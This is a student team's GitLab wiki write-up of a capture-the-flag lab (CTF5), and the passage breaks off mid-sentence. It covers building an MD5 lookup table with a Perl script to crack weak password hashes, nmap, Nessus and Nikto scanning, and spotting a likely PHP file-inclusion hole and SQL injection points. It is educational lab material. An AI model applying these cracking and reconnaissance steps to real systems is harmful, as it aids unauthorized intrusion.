<!DOCTYPE html>
<html class="" lang="en"><head prefix="og: http://ogp.me/ns#">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta content="IE=edge" http-equiv="X-UA-Compatible">
<meta content="object" property="og:type">
<meta content="GitLab" property="og:site_name">
<meta content="Ctf5 · Wiki · sys-sec2018 / team07" property="og:title">
<meta content="GitLab Community Edition" property="og:description">
<meta content="https://charon.cs.uni.edu/assets/gitlab_logo-7ae504fe4f68fdebb3c2034e36621930cd36ea87924c11ff65dbcb8ed50dca58.png" property="og:image">
<meta content="64" property="og:image:width">
<meta content="64" property="og:image:height">
<meta content="https://charon.cs.uni.edu/sys-sec2018/team07/wikis/ctf5" property="og:url">
<meta content="summary" property="twitter:card">
<meta content="Ctf5 · Wiki · sys-sec2018 / team07" property="twitter:title">
<meta content="GitLab Community Edition" property="twitter:description">
<meta content="https://charon.cs.uni.edu/assets/gitlab_logo-7ae504fe4f68fdebb3c2034e36621930cd36ea87924c11ff65dbcb8ed50dca58.png" property="twitter:image">

<title>Ctf5 · Wiki · sys-sec2018 / team07 · GitLab</title>
<meta content="GitLab Community Edition" name="description">
<link rel="shortcut icon" type="image/x-icon" href="https://charon.cs.uni.edu/assets/favicon-075eba76312e8421991a0c1f89a89ee81678bcde72319dd3e8047e2a47cd3a42.ico" id="favicon">
<link rel="stylesheet" media="all" href="test2_files/application-8138c3e6d7ae415c96591b227125f4ec49d96a1eee15d0bd.css">
<link rel="stylesheet" media="print" href="test2_files/print-74b3d49adeaada27337e759b75a34af7cf3d80051de91d60d40570.css">


<script>
//<![CDATA[
window.gon={};gon.api_version="v4";gon.default_avatar_url="https:\/\/charon.cs.uni.edu\/assets\/no_avatar-849f9c04a3a0d0cea2424ae97b27447dc64a7dbfae83c036c45b403392f0e8ba.png";gon.max_file_size=10;gon.asset_host=null;gon.webpack_public_path="\/assets\/webpack\/";gon.relative_url_root="";gon.shortcuts_path="\/help\/shortcuts";gon.user_color_scheme="white";gon.gitlab_url="https:\/\/charon.cs.uni.edu";gon.revision="ec4ac77";gon.gitlab_logo="\/assets\/gitlab_logo-7ae504fe4f68fdebb3c2034e36621930cd36ea87924c11ff65dbcb8ed50dca58.png";gon.sprite_icons="\/assets\/icons-2666da8eb968ba69467c0369d020bf011a5d0b1bd253ba0dbcc43bd0ccbd0dcb.svg";gon.sprite_file_icons="\/assets\/file_icons-7262fc6897e02f1ceaf8de43dc33afa5e4f9a2067f4f68ef77dcc87946575e9e.svg";gon.current_user_id=103;gon.current_username="riesberm";gon.current_user_fullname="Michael Riesberg-Timmer";gon.current_user_avatar_url="https:\/\/secure.gravatar.com\/avatar\/e565120a5e49a75f466b0b049b10b4c9?s=80\u0026d=identicon";
//]]>
</script>

<script src="test2_files/webpack_runtime.js" defer="defer"></script>
<script src="test2_files/common.js" defer="defer"></script>
<script src="test2_files/main.js" defer="defer"></script>



<script>
  window.uploads_path = "/sys-sec2018/team07/uploads";
</script>

<meta name="csrf-param" content="authenticity_token">
<meta name="csrf-token" content="gAfn3V4UVNZmmJM+Nkno7pgrBu7bFMPKwvNymAgiIeMqppIZPTEja7+Tl4DmX8PTiido5eD0+oPl4SCdWqG2Sg==">
<meta content="origin-when-cross-origin" name="referrer">
<meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport">
<meta content="#474D57" name="theme-color">
<link rel="apple-touch-icon" type="image/x-icon" href="https://charon.cs.uni.edu/assets/touch-icon-iphone-5a9cee0e8a51212e70b90c87c12f382c428870c0ff67d1eb034d884b78d2dae7.png">
<link rel="apple-touch-icon" type="image/x-icon" href="https://charon.cs.uni.edu/assets/touch-icon-ipad-a6eec6aeb9da138e507593b464fdac213047e49d3093fc30e90d9a995df83ba3.png" sizes="76x76">
<link rel="apple-touch-icon" type="image/x-icon" href="https://charon.cs.uni.edu/assets/touch-icon-iphone-retina-72e2aadf86513a56e050e7f0f2355deaa19cc17ed97bbe5147847f2748e5a3e3.png" sizes="120x120">
<link rel="apple-touch-icon" type="image/x-icon" href="https://charon.cs.uni.edu/assets/touch-icon-ipad-retina-8ebe416f5313483d9c1bc772b5bbe03ecad52a54eba443e5215a22caed2a16a2.png" sizes="152x152">
<link color="rgb(226, 67, 41)" href="https://charon.cs.uni.edu/assets/logo-d36b5212042cebc89b96df4bf6ac24e43db316143e89926c0db839ff694d2de4.svg" rel="mask-icon">
<meta content="/assets/msapplication-tile-1196ec67452f618d39cdd85e2e3a542f76574c071051ae7effbfde01710eb17d.png" name="msapplication-TileImage">
<meta content="#30353E" name="msapplication-TileColor">



<script type="text/javascript" charset="utf-8" async="" src="test2_files/emoji.js"></script><script type="text/javascript" charset="utf-8" async="" src="test2_files/projects-03eda0.js"></script><script type="text/javascript" charset="utf-8" async="" src="test2_files/projects__wikis-4eb413.js"></script></head>

<body class="ui_indigo " data-group="" data-page="projects:wikis:show" data-project="team07">




<div class="layout-page page-gutter page-with-contextual-sidebar right-sidebar-expanded wiki-sidebar">


<div class="content-wrapper">

<div class="mobile-overlay"></div>
<div class="alert-wrapper">


<nav class="breadcrumbs container-fluid container-limited limit-container-width limit-container-width-sm" role="navigation">
<div class="breadcrumbs-container">
<button name="button" type="button" class="toggle-mobile-nav"><span class="sr-only">Open sidebar</span>
<i aria-hidden="true" data-hidden="true" class="fa fa-bars"></i>
</button><div class="breadcrumbs-links js-title-container">
<ul class="list-unstyled breadcrumbs-list js-breadcrumbs-list">
<li><a class="group-path breadcrumb-item-text js-breadcrumb-item-text " href="https://charon.cs.uni.edu/sys-sec2018"><img class="avatar-tile js-lazy-loaded" src="test2_files/tux_virus.png" width="15" height="15">sys-sec2018</a><svg class="s8 breadcrumbs-list-angle"><use xlink:href="/assets/icons-2666da8eb968ba69467c0369d020bf011a5d0b1bd253ba0dbcc43bd0ccbd0dcb.svg#angle-right"></use></svg></li> <li><a href="https://charon.cs.uni.edu/sys-sec2018/team07"><span class="breadcrumb-item-text js-breadcrumb-item-text">team07</span></a><svg class="s8 breadcrumbs-list-angle"><use xlink:href="/assets/icons-2666da8eb968ba69467c0369d020bf011a5d0b1bd253ba0dbcc43bd0ccbd0dcb.svg#angle-right"></use></svg></li>
<li><a href="https://charon.cs.uni.edu/sys-sec2018/team07/wikis/home">Wiki</a><svg class="s8 breadcrumbs-list-angle"><use xlink:href="/assets/icons-2666da8eb968ba69467c0369d020bf011a5d0b1bd253ba0dbcc43bd0ccbd0dcb.svg#angle-right"></use></svg></li>

<li>
<h2 class="breadcrumbs-sub-title"><a href="https://charon.cs.uni.edu/sys-sec2018/team07/wikis/ctf5">Ctf5</a></h2>
</li>
</ul>
</div>

</div>
</nav>

<div class="flash-container flash-container-page">
</div>

</div>
<div class="container-fluid container-limited limit-container-width limit-container-width-sm">
<div class="content" id="content-body">
<div class="wiki-page-header has-sidebar-toggle">
<button class="btn btn-default sidebar-toggle js-sidebar-wiki-toggle" role="button" type="button">
<i aria-hidden="true" data-hidden="true" class="fa fa-angle-double-left"></i>
</button>

<h1 dir="auto">
<a id="user-content-step-1-build-an-md5-hash-database" class="anchor" href="#step-1-build-an-md5-hash-database" aria-hidden="true"></a>Step 1 – Build an MD5 Hash Database</h1>

<p dir="auto">Build an MD5 hash rainbow table to look up discovered hashes.</p>

<h2 dir="auto">
<a id="user-content-md5-rainbow-tables" class="anchor" href="#md5-rainbow-tables" aria-hidden="true"></a>MD5 Rainbow Tables</h2>

<p dir="auto">MD5 is a popular hashing algorithm used in many web 
applications. A hash is a one way mathematical transformation that is 
designed to provide a unique output for any given input. MD5 (or Message
 Digest version 5) is one of the more popular hash algorithms (another 
popular one being SHA). MD5 will take input and produce a unique 32 
hexadecimal output for any input. For instance, the MD5 hashed value of 
the word “apple” is “1f3870be274f6c49b3e31a0c6728957f “. Hashing 
algorithms are one way functions – that is there is a formula to derive 
the hash of the word apple, and it consistently provides the same 
result. However, there is no way to derive the word apple from the hash 
(mathematically).</p>

<p dir="auto">Hashes are often used in web applications in order to 
store passwords. Since it is unsafe to store actual password values in 
databases that power web applications, many developers opt to store 
password hashes in an application database instead. Application logic 
then asks the user for their password, hashes the value, and stores the 
hash in the database. Thus when the user enters their password only the 
hash is stored or compared, not the actual value of the password.</p>

<p dir="auto">There are two problems with this scheme. The first is that
 it is possible to have collisions – situations where more than one 
unique input can result in the same hash. The other problem is that hash
 values can be calculated. Attackers can use this strategy to create 
offline rainbow tables.</p>

<p dir="auto">A rainbow table is a lot like a dictionary list used for 
brute forcing. However, whereas a dictionary list simply contains lists 
of possible passwords, a rainbow table contains the list of possible 
passwords linked to their hash values. Creating an MD5 hash rainbow 
table takes relatively little computing power or space. Once the rainbow
 table is created it is easy for an attacker to defeat the one way 
function of the hash by looking up a hash value and finding the input 
that was used to create the hash.</p>

<p dir="auto">Computer users are consistently shown to be the weakest 
link in any computer security chain. Users often choose weak passwords. 
We can exploit this weakness by taking a list of weak passwords, 
generating an MD5 rainbow table and then using that table to look up 
hash values and reveal passwords.</p>

<h2 dir="auto">
<a id="user-content-creating-an-md5-rainbow-database-in-mysql" class="anchor" href="#creating-an-md5-rainbow-database-in-mysql" aria-hidden="true"></a>Creating an MD5 Rainbow Database in MySQL</h2>

<p dir="auto">Databases are ideally designed for this sort of operation.
 We'll use a simple Perl script to open up a word list file, calculate 
the MD5 hash of each value, and insert the word and the value into a 
database that we can later query.</p>

<p dir="auto">In order to get started with our MD5 rainbow table the first thing we need to do is use the following command to start mysql:</p>

<p dir="auto"><code>root@kali:~# service mysql start</code></p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/48c2b7c87a0cc5f5e0a25ba6c22a22a3/image.png" target="_blank" rel="noopener noreferrer"><img src="test2_files/image.png" alt="image" class="js-lazy-loaded"></a></p>

<p dir="auto">And make sure there are no errors.</p>

<p dir="auto">Once MySQL is started we need to create a new database for
 our password hashes. While there are GUI programs available (such as 
MySQL Administrator and MySQL Query Browser) it is faster for this sort 
of an operation to just use the CLI (Command Line Interface) to MySQL. 
To log into MySQL simply use the command:</p>

<p dir="auto"><code>root@kali:~# mysql -u root</code></p>

<p dir="auto">At this point your command prompt should change to the MySQL command prompt (mysql&gt;):</p>

<p dir="auto">Once you're logged into MySQL create a new database with the command:<code>MariaDB [(none)]&gt; create database rainbow;</code></p>

<p dir="auto">Next change into that database: <code>MariaDB [(none)]&gt; use rainbow;</code></p>

<p dir="auto">Now let's set up our table to store our rainbow table with the MySQL command: <code>MariaDB [rainbow]&gt; create table hash (hash_word varchar(100), hash_hash varchar(32));</code></p>

<p dir="auto">Query OK, 0 rows affected (0.0.1 sec)</p>

<p dir="auto">You can verify your table was created properly using the 'desc' or describe command:</p>

<p dir="auto"><code>MaridaDB [rainbow]&gt; desc hash;</code></p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/95f24ec272f9ac9ad0d71a13ec1f6f6d/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/95f24ec272f9ac9ad0d71a13ec1f6f6d/image.png"></a></p>

<p dir="auto">Now let's leave MySQL using the 'quit' command:</p>

<p dir="auto">Now that we have our table, it's time to populate it. 
Firstly let's locate a good word list – there happens to be one in the 
dirbuster wordlist folder. at <code>/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt</code>. We can use this in our perl script.</p>

<p dir="auto">Next we're going to write up a quick Perl script that will
 go through the word list and create hashes for us. Open the text editor
 using notepad icon at the top of the screen. Once this is open copy the
 following code into the new text document:</p>

<pre class="code highlight js-syntax-highlight plaintext white" v-pre="true" lang="plaintext"><code><span id="LC1" class="line" lang="plaintext">use Digest::MD5  qw(md5 md5_hex md5_base64);</span>
<span id="LC2" class="line" lang="plaintext"></span>
<span id="LC3" class="line" lang="plaintext">use DBI;</span>
<span id="LC4" class="line" lang="plaintext"></span>
<span id="LC5" class="line" lang="plaintext">my $dbh = DBI-&gt;connect('DBI:mysql:rainbow', 'root', '') || die "Could</span>
<span id="LC6" class="line" lang="plaintext">not connect $DBI::errstr";</span>
<span id="LC7" class="line" lang="plaintext"></span>
<span id="LC8" class="line" lang="plaintext">open (FILE, '/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt') || die('Could not open file');</span>
<span id="LC9" class="line" lang="plaintext"></span>
<span id="LC10" class="line" lang="plaintext">while (&lt;FILE&gt;) {</span>
<span id="LC11" class="line" lang="plaintext">        my $data;</span>
<span id="LC12" class="line" lang="plaintext">        chomp($data = $_);</span>
<span id="LC13" class="line" lang="plaintext">        $data =~ s/\r\n?//g;</span>
<span id="LC14" class="line" lang="plaintext">        $hash = md5_hex $data;</span>
<span id="LC15" class="line" lang="plaintext">        $data =~ s/'/''/g;</span>
<span id="LC16" class="line" lang="plaintext">        my @vals = ($data, $hash);</span>
<span id="LC17" class="line" lang="plaintext">        my $sth = $dbh-&gt;prepare("insert into hash</span>
<span id="LC18" class="line" lang="plaintext">(hash_word,hash_hash) values (?,?)");</span>
<span id="LC19" class="line" lang="plaintext">        $sth-&gt;execute(@vals) || die "Query failed! $DBI::errstr";</span>
<span id="LC20" class="line" lang="plaintext">}</span>
<span id="LC21" class="line" lang="plaintext">close(FILE);</span>
<span id="LC22" class="line" lang="plaintext">$dbh-&gt;disconnect();</span></code></pre>
<p dir="auto">Finally save the file as 'md5.pl':</p>

<p dir="auto">Go back to your command prompt and ensure that md5.pl is in your home directory.</p>

<p dir="auto">Finally execute the program using the command:</p>

<p dir="auto"><code>root@kali:~# perl md5.pl</code></p>

<p dir="auto">You shouldn't get any error messages, but let's confirm 
that the program worked by looking up the md5 hash for the word pacific 
by logging into the database and running a query:</p>

<p dir="auto"><code>[root@kali:~# mysql -u root rainbow</code></p>

<p dir="auto"><code>mysql&gt; select * from hash where hash_word = 'pacific';</code></p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/7bb8d7a53188bf779b0606ab591f36cb/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/7bb8d7a53188bf779b0606ab591f36cb/image.png"></a></p>

<p dir="auto">Now our rainbow table is complete!</p>

<h1 dir="auto">
<a id="user-content-step-2-reconnaissance" class="anchor" href="#step-2-reconnaissance" aria-hidden="true"></a>Step 2 – Reconnaissance</h1>

<p dir="auto">Find the target and discover what services are available on the remote machine using NMAP.</p>

<h2 dir="auto">
<a id="user-content-scanning-with-nmap" class="anchor" href="#scanning-with-nmap" aria-hidden="true"></a>Scanning with NMAP</h2>

<p dir="auto">NMAP (the Network MAPper <a href="http://nmap.org/" rel="nofollow noreferrer noopener" target="_blank">http://nmap.org</a>)
 can be used to quickly scan large ranges of IP addresses. NMAP uses a 
number of techniques to discover ports that are open on remote machines.
 Open ports generally indicate available services that an attacker can 
interact with, so they are of particular interest to us. Firewall rules 
on the target may limit port access, however, so there may be services 
that are unavailable from the outside. NMAP will inspect the machine and
 let us know what services are available.</p>

<p dir="auto">NMAP can also analyze TCP/IP fingerprints of remote 
machines and determine operating systems and versions running on those 
machines. Different operating systems implement networking in subtly 
different ways and NMAP uses this information to compare responses to a 
large database of known OS fingerprints.</p>

<p dir="auto">NMAP has a graphical interface, but the command line 
version is often preferable and is just as full featured. In order to 
open a command prompt, access the Terminal program under the 
Applications menu → System → Terminal, or using the quick launch icon in
 the tool bar at the top of the SAS_Attack VMware image.</p>

<p dir="auto">The first thing we should do is run an NMAP scan against 
the entire target IP address range (192.168.0.3-192.168.0.49) and 
discover machines. To do this we'll use the -F flag, for a fast scan. 
Open a command prompt and run NMAP by typing:</p>

<p dir="auto"><code># nmap -F &lt;Your IP here&gt;</code>
<a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/d3c22c8d30615bbca3d87fe879b65b67/Screen_Shot_2018-02-28_at_3.29.31_PM.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="Screen_Shot_2018-02-28_at_3.29.31_PM" class="lazy" data-src="/sys-sec2018/team07/uploads/d3c22c8d30615bbca3d87fe879b65b67/Screen_Shot_2018-02-28_at_3.29.31_PM.png"></a>
The NMAP scan takes some time but it should find the target and look something like:</p>

<p dir="auto">The scan finds the target in just over a minute and a 
half. The scan also indicates that several well known services are 
running.</p>

<p dir="auto">Now that we've found the target machine, let's try and do 
some discovery. This involves doing a targeted scan and grabbing 
information we can use to identify versions of services and the 
operating system (OS). We can use NMAP to do this, or we can do banner 
grabs manually. In this exercise we'll try both methods. In order to do 
OS detection we have to listen to packet responses from the target 
machine, an operation which requires root permissions. Let's first 
become root. In your terminal window type:</p>

<p dir="auto">$ su</p>

<p dir="auto">Enter the password and notice that the prompt character 
changes from a '$' symbol to a '#' symbol, indicated that you are now 
operating as the root user. Next try NMAP using the command (note the IP
 shown in this command may vary depending on where you found the 
machine):</p>

<p dir="auto">'# nmap -sV -O -PN </p>

<p dir="auto">the -sV flags will do service version detection, the -O 
flag will do operating system fingerprinting, and the -PN flag tells 
NMAP to skip ICMP pinging the host before scanning (since we already 
know the host is up). ICMP pings are used by NMAP to determine if IP 
addresses are used, but many devices block ICMP traffic, so it is 
worthwhile to use this operation if you suspect a machine may occupy an 
address space, but isn't responding to NMAP.</p>

<p dir="auto">NMAP may take some time to perform this operation, you may
 want to skip ahead to the next section “Manual Banner Grabbing” before 
coming back to view the results You can open a new tab in the console 
window with Shift+Ctrl+T (or under the File menu) .
Once NMAP completes the operating system and version detection, a 
process that may take 15 minutes, it will present results in a formatted
 output. Be sure to read all of the output to get a better sense of how 
NMAP came to it's reported conclusions.</p>

<h2 dir="auto">
<a id="user-content-nmap-operating-system-and-version-detection-output" class="anchor" href="#nmap-operating-system-and-version-detection-output" aria-hidden="true"></a>NMAP operating system and version detection output:</h2>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/49cf5b7a0112fa49e47f3acc1fd77ad2/Screen_Shot_2018-02-28_at_3.36.02_PM.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="Screen_Shot_2018-02-28_at_3.36.02_PM" class="lazy" data-src="/sys-sec2018/team07/uploads/49cf5b7a0112fa49e47f3acc1fd77ad2/Screen_Shot_2018-02-28_at_3.36.02_PM.png"></a></p>

<p dir="auto">You'll notice that the MAC address of the target is 
clearly identified as VMWare. MAC addresses are configurable, and you 
can easily change this value in VMWare to make the target look more 
realistic.</p>

<p dir="auto">You can also see that NMAP has determined that the target 
is running Linux, likely with a 2.6 version kernel. NMAP also discovered
 that OpenSSH 4.7 is running on port 22, Sendmail 8.14.1 is running on 
port 25, and Apache 2.2.6 is running on port 80. Apache was also able to
 determine that Apache is reporting that it is running on the Fedora 
Linux distribution.</p>

<h1 dir="auto">
<a id="user-content-step-3-vulnerability-scan" class="anchor" href="#step-3-vulnerability-scan" aria-hidden="true"></a>Step 3 – Vulnerability scan</h1>

<p dir="auto">Run a comprehensive vulnerability scan of the target.</p>

<h1 dir="auto">
<a id="user-content-vulnerability-scanning-with-nessus" class="anchor" href="#vulnerability-scanning-with-nessus" aria-hidden="true"></a>Vulnerability Scanning with Nessus</h1>

<p dir="auto">Vulnerability scanning involves looking at the actual 
services running and performing an audit for problems. One industry 
standard vulnerability scanner is Nessus, which is available as either a
 free trial or a paid product for download. Nessus will test the 
services
installed and look for problems, generating a handy report of it's 
findings. Nessus
has a web client, You will need to download nessus online at <a href="https://www.tenable.com/blog/getting-started-with-nessus-on-kali-linux" rel="nofollow noreferrer noopener" target="_blank">https://www.tenable.com/blog/getting-started-with-nessus-on-kali-linux</a> </p>

<p dir="auto">Version: Select the one ending in “_amd64.deb” which is listed to be for Kali</p>

<p dir="auto">Run the following commands in the same directory as the downloaded .deb file.</p>

<pre class="code highlight js-syntax-highlight plaintext white" v-pre="true" lang="plaintext"><code><span id="LC1" class="line" lang="plaintext"># dpkg -i Nessus-7.0.2-debian6_amd64.deb</span>
<span id="LC2" class="line" lang="plaintext"># /etc/init.d/nessusd start</span></code></pre>
<p dir="auto">Go to <a href="https://localhost:8834/" rel="nofollow noreferrer noopener" target="_blank">https://localhost:8834</a></p>

<p dir="auto">You will be prompted that the site is insecure. Click advanced and add an exception for this site.</p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/a98b04ffaf8e26d6e9d32af4a3a0c4cc/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/a98b04ffaf8e26d6e9d32af4a3a0c4cc/image.png"></a></p>

<p dir="auto">You will be prompted to create an account and you can use whatever username and password you would like. </p>

<p dir="auto">Get an activation key by going to <a href="https://www.tenable.com/products/nessus-home" rel="nofollow noreferrer noopener" target="_blank">https://www.tenable.com/products/nessus-home</a>
 The key you receive will be in plain text sent to you over email. Copy 
the activation code sent to your email and enter it on the second step 
for the web portal and then wait for all the plugins to download.</p>

<p dir="auto">Note that the cached credentials for Nessus may not be 
right. If you get an error click the 'Edit' button in the 'Connection 
Manager' window then replace the login and password with “sasattack”:</p>

<p dir="auto">Once connected click the new scan button on the page and 
select "advanced scan" which is the first option. Then fill in a name 
(doesn't matter what it is) and the IP which is your CTF5 IP address.</p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/52a14f63a677d8f57f60dd39f2653f92/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/52a14f63a677d8f57f60dd39f2653f92/image.png"></a></p>

<p dir="auto">Click 'Save' then select the 'Default scan policy' in the 
right hand 'Select a scan policy:' window and click the 'Scan Now' 
button at the bottom of the Nessus client.
This will begin the scan, which may take some time to complete. The 
report can be exported to an HTML file for later viewing. You can expand
 the left hand tree under the IP address of the target to view results 
of the vulnerability scan. The results are color coded so you can easily
 pick out which vulnerabilities are the most dangerous.</p>

<p dir="auto">Nessus scan results:</p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/6bbbeb10c2f9f2ceca630e89c2310cf2/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/6bbbeb10c2f9f2ceca630e89c2310cf2/image.png"></a></p>

<p dir="auto">Take some time to read through the results of the scan – you may find some very interesting information.</p>

<h2 dir="auto">
<a id="user-content-vulnerability-scanning-with-nikto" class="anchor" href="#vulnerability-scanning-with-nikto" aria-hidden="true"></a>Vulnerability Scanning with Nikto</h2>

<p dir="auto">Nessus is very good at scanning targets to look for 
vulnerabilities across multiple services. There are, however, 
specialized vulnerability scanners tailored for specific services. Nikto
 is a popular, open source web application vulnerability scanner written
 in Perl. Nikto is extremely good at identifying problems in web 
applications. Nikto is a command line program, so we can start it up 
using:</p>

<p dir="auto">nikto -host 
Once Nikto is started it will audit the target web server and 
applications it finds on that server. Be sure to pay careful attention 
to the results, Nikto will often find very useful information:</p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/986fa848b135a1cca104347d12bcc44d/Screen_Shot_2018-02-28_at_3.41.14_PM.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="Screen_Shot_2018-02-28_at_3.41.14_PM" class="lazy" data-src="/sys-sec2018/team07/uploads/986fa848b135a1cca104347d12bcc44d/Screen_Shot_2018-02-28_at_3.41.14_PM.png"></a></p>

<p dir="auto">Nikto will find many of the same things that Nessus will, 
but it will also identify some unique attributes of the target. One 
thing to note is that Nikto has identified that PHP 5.2.4 is powering 
the web server.</p>

<p dir="auto">Nikto has also tried to identify specific open source 
packages that are installed on the target, you'll notice that Nikto 
identified phpMyAdmin (<a href="http://www.phpmyadmin.net/" rel="nofollow noreferrer noopener" target="_blank">http://www.phpmyadmin.net</a>)
 as well as several interesting directories that might be worth checking
 out.
Nikto also identifies certain scripts that could indicate 
vulnerabilities that have not been identified. For instance Nikto points
 out that /mail/src/read_body.php has been identified as part of 
automated scans – indicating it might have a vulnerability.</p>

<h1 dir="auto">
<a id="user-content-step-4-manual-discovery" class="anchor" href="#step-4-manual-discovery" aria-hidden="true"></a>Step 4 – Manual Discovery</h1>

<p dir="auto">Explore the services (specifically the web services) on 
the target. Try to identify versions of software installed and search 
for known vulnerabilities.</p>

<h2 dir="auto">
<a id="user-content-manual-discovery" class="anchor" href="#manual-discovery" aria-hidden="true"></a>Manual Discovery</h2>

<p dir="auto">At this point we've been poking at the target using 
automated tools, but these are no substitute for a trained penetration 
tester. Let's add the human element and our own ingenuity to the mix and
 take a look at the target using a web browser. Browse to the main page 
and take a look at what is available:</p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/be4c7369c2358c3932d42783d1be9766/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/be4c7369c2358c3932d42783d1be9766/image.png"></a></p>

<p dir="auto">Manual discovery involves actually paging through the 
target website. Pay careful attention to the location of forms as well 
as conventions used in URL's. URL's can indicate what sorts of variables
 or functions are being performed in the underlying PHP codebase. For 
instance, we quickly notice that many of the URL's on the front page 
contain the format:</p>

<pre class="code highlight js-syntax-highlight plaintext white" v-pre="true" lang="plaintext"><code><span id="LC1" class="line" lang="plaintext">?page=about</span>
<span id="LC2" class="line" lang="plaintext">?page=contact</span></code></pre>
<p dir="auto">This URL structure seems to indicate some sort of server side include, probably using a format such as:</p>

<pre class="code highlight js-syntax-highlight plaintext white" v-pre="true" lang="plaintext"><code><span id="LC1" class="line" lang="plaintext">&lt;?php</span>
<span id="LC2" class="line" lang="plaintext">    include_once($_GET['page']);</span>
<span id="LC3" class="line" lang="plaintext">?&gt;</span></code></pre>
<p dir="auto">It might be possible to use this structure to include other pages that the developer never intended.</p>

<p dir="auto">Looking at the 'Contact' link we see a form is utilized. 
Forms are a primary injection point for malicious user supplied data. We
 might be able to exploit this form using SQL injection techniques to 
reveal data about underlying databases, perhaps disclosing privileged</p>

<pre class="code highlight js-syntax-highlight plaintext white" v-pre="true" lang="plaintext"><code><span id="LC1" class="line" lang="plaintext">?page=about</span>
<span id="LC2" class="line" lang="plaintext">?page=contact</span>
<span id="LC3" class="line" lang="plaintext">&lt;?php</span>
<span id="LC4" class="line" lang="plaintext">    include_once($_GET['page']);</span>
<span id="LC5" class="line" lang="plaintext">?&gt;</span></code></pre>
<p dir="auto">information such as the company contact list or even usernames and passwords.</p>

<h2 dir="auto">
<a id="user-content-identifying-open-source-software" class="anchor" href="#identifying-open-source-software" aria-hidden="true"></a>Identifying Open Source Software</h2>

<p dir="auto">Reviewing the primary link navigation you'll also notice 
two links that don't fit the format of the others. The 'Events' link and
 the 'Blog' link seem to point to entirely new URL's. This could 
indicate the utilization of a separate web application to power these 
areas of the site.</p>

<p dir="auto">Looking at the front page doesn't seem to reveal a whole 
lot. If you explore the links, however, you'll find some interesting 
material. For instance, if you take a look at the 'Events' link you'll 
see this link seems to point to an almost totally different website:</p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/9bf031ba9d58510713f34c0dbff87985/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/9bf031ba9d58510713f34c0dbff87985/image.png"></a></p>

<p dir="auto">Hovering over the various links will show a distinctive 
URL pattern that seems to include the &amp;q= stanza. Hovering over some
 of the links will reveal links such as</p>

<p dir="auto"><code>&amp;q=node/3</code></p>

<p dir="auto">This URL style is distinctive to Drupal (<a href="http://drupal.org/" rel="nofollow noreferrer noopener" target="_blank">http://drupal.org</a>)
 content management system
installations. In fact, our Nessus scan revealed that Drupal was 
installed. Nessus also identified the version of Drupal as 5.10, an 
older version that might have vulnerabilities. Browsing to the “blog” 
link from the front page of the site reveals lots of other interesting 
information:</p>

<p dir="auto"><a class="no-attachment-icon" href="https://charon.cs.uni.edu/sys-sec2018/team07/uploads/b5a3696fd545d7375bf914e6c88bb58f/image.png" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="image" class="lazy" data-src="/sys-sec2018/team07/uploads/b5a3696fd545d7375bf914e6c88bb58f/image.png"></a></p>

<p dir="auto">The first interesting item is the URL, which includes:</p>

<p dir="auto">~andy</p>

<p dir="auto">This is the denotation used by Apache when users have web 
accessible directories directly in their home directory. It looks as 
though one of the system users (andy) has set up a web site. Looking at 
